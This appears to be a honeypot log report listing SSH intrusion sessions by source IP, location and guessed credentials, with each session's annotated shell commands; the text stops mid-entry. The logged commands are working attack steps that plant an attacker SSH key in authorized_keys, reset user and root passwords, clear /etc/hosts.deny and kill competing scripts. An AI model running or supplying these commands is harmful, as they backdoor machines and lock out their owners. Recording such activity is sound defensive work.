$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "action\n9qra6ybgakRJ\n9qra6ybgakRJ"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "action\n9qra6ybgakRJ\n9qra6ybgakRJ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:lW7eIAjFBgBl"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ echo -e "1q2w3e4r\nOzq8rd0MIzJh\nOzq8rd0MIzJh"|passwd|bash
$ echo "1q2w3e4r\nOzq8rd0MIzJh\nOzq8rd0MIzJh\n"|passwd
🎭 cosmo_root (95.165.27.83) β€” Moscow, Russia Β· 1 session Β· 19 cmds
2026-06-10 14:14 EDT Β· as root/manish
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:ZXHiumOiwpxb"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_29 (103.43.191.43) β€” Kwai Chung, Hong Kong Β· 4 sessions Β· 78 cmds
2026-05-30 04:44 EDT Β· as action/action, bitrix/1q2w3e4r, root/!Q@W#E$R1q2w3e4r
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo -e "1q2w3e4r\nDMUwUX0JOMGg\nDMUwUX0JOMGg"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "1q2w3e4r\nDMUwUX0JOMGg\nDMUwUX0JOMGg\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo "root:AZyR5errcrco"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ echo -e "action\nprVCPjGV6ha1\nprVCPjGV6ha1"|passwd|bash
$ echo "action\nprVCPjGV6ha1\nprVCPjGV6ha1\n"|passwd
$ echo "root:c1DGq39eLkXo"|chpasswd|bash
🎭 phantom_root_25 (45.158.14.124) β€” Istanbul, TΓΌrkiye Β· 2 sessions Β· 39 cmds
2026-06-10 13:42 EDT Β· as bitrix/1q2w3e4r, root/!Q@W#E$R1q2w3e4r
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "1q2w3e4r\n9mRPqWgf1Gcp\n9mRPqWgf1Gcp"|passwd|bash
$ Enter new UNIX password:
$ echo "1q2w3e4r\n9mRPqWgf1Gcp\n9mRPqWgf1Gcp\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:ixqbnDoWbiez"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 cipher_root_28 (203.135.42.52) β€” Karachi, Pakistan Β· 3 sessions Β· 59 cmds
2026-06-10 13:42 EDT Β· as action/action, bitrix/1q2w3e4r, root/!Q@W#E$R1q2w3e4r
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "1q2w3e4r\nG32FGgIGREIr\nG32FGgIGREIr"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "1q2w3e4r\nG32FGgIGREIr\nG32FGgIGREIr\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:pmgJEe0Pinf8"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ echo -e "action\nLwGJbcTFoYte\nLwGJbcTFoYte"|passwd|bash
$ echo "action\nLwGJbcTFoYte\nLwGJbcTFoYte\n"|passwd
🎭 dutch_root_3 (45.156.87.93) β€” Eygelshoven, Netherlands Β· 1 session Β· 1 cmd
2026-06-10 13:56 EDT Β· as dev/123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m
🎭 dragon_root_4 (117.60.107.180) β€” Nanjing, China Β· 1 session Β· 1 cmd
2026-06-10 12:58 EDT Β· as root/---fuck_you----
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 rogue_root_30 (202.79.29.108) β€” Phnom Penh, Cambodia Β· 1 session Β· 20 cmds
2026-06-10 12:53 EDT Β· as hendra/123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\nDqXsYOKOe0mk\nDqXsYOKOe0mk"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nDqXsYOKOe0mk\nDqXsYOKOe0mk\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wraith_root_30 (187.212.10.12) β€” Puebla City, Mexico Β· 1 session Β· 20 cmds
2026-06-10 12:19 EDT Β· as bayu/bayu123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "bayu123\nFyNQMtrCNCub\nFyNQMtrCNCub"|passwd|bash
$ Enter new UNIX password:
$ echo "bayu123\nFyNQMtrCNCub\nFyNQMtrCNCub\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 eagle_root_15 (50.116.72.133) β€” Houston, United States Β· 1 session Β· 20 cmds
2026-06-10 12:02 EDT Β· as df/df
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "df\nmndSUPgnAnLj\nmndSUPgnAnLj"|passwd|bash
$ Enter new UNIX password:
$ echo "df\nmndSUPgnAnLj\nmndSUPgnAnLj\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 silk_root_6 (123.157.223.90) β€” Hangzhou, China Β· 1 session Β· 19 cmds
2026-06-10 11:56 EDT Β· as root/!@#$qwerASDFzxcv
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:2EGxANqpJw3X"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cipher_root_22 (212.64.216.142) β€” Esenyurt, Turkey Β· 2 sessions Β· 40 cmds
2026-06-06 15:06 EDT Β· as brandon/123456, vbox/qwerty
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "123456\nH5bSFevzpWhl\nH5bSFevzpWhl"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "123456\nH5bSFevzpWhl\nH5bSFevzpWhl\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "qwerty\nafiUmemTbR9J\nafiUmemTbR9J"|passwd|bash
$ echo "qwerty\nafiUmemTbR9J\nafiUmemTbR9J\n"|passwd
🎭 crepe_root_7 (167.86.117.136) β€” Lauterbourg, France Β· 1 session Β· 20 cmds
2026-06-10 10:40 EDT Β· as komodo/komodo
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "komodo\nqwloEozmtrqh\nqwloEozmtrqh"|passwd|bash
$ Enter new UNIX password:
$ echo "komodo\nqwloEozmtrqh\nqwloEozmtrqh\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 burger_root_23 (50.116.72.11) β€” Houston, United States Β· 1 session Β· 20 cmds
2026-06-10 10:34 EDT Β· as brandon/123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\nwEfyzoq97D7S\nwEfyzoq97D7S"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nwEfyzoq97D7S\nwEfyzoq97D7S\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 pretzel_root_7 (165.227.170.113) β€” Frankfurt am Main, Germany Β· 1 session Β· 20 cmds
2026-06-10 10:33 EDT Β· as brandon/123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\nPkD2pBJ1Joo3\nPkD2pBJ1Joo3"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nPkD2pBJ1Joo3\nPkD2pBJ1Joo3\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_24 (102.216.240.61) β€” Kinshasa, Congo (DRC) Β· 2 sessions Β· 39 cmds
2026-05-18 06:06 EDT Β· as logviewer/123456, root/server2
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
